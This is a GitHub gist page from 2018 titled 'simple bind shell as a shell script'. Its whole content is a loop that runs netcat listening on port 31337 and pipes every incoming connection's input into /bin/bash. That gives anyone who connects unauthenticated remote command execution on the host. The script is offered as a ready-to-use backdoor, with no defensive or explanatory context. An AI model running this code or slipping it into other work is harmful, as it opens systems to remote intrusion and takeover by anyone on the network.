Skip to content

Instantly share code, notes, and snippets.

@ahhh
Created January 2, 2018 23:11
Show Gist options
  • Save ahhh/609cdf5abaa22e233976aec55a3e0dfd to your computer and use it in GitHub Desktop.
Save ahhh/609cdf5abaa22e233976aec55a3e0dfd to your computer and use it in GitHub Desktop.
simple bind shell as a shell script
while [[ true ]] ; do
nc -l 31337 | /bin/bash
done
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment